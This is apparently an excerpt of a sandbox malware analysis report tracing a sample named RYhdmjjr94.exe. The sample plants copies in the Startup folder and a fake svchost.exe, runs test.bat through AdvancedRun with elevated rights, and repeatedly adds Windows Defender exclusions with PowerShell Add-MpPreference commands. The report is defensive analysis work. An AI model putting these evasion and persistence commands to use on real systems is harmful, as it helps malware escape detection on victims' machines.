                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.391075697.0000000005EA0000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmp | Binary or memory string: Progman
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
                Source: explorer.exe, 00000025.00000000.425382914.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
                Source: RYhdmjjr94.exe, 00000000.00000000.419511219.00000000010A0000.00000002.00020000.sdmp, explorer.exe, 00000025.00000000.427060111.0000000001640000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Users\user\Desktop\RYhdmjjr94.exe VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
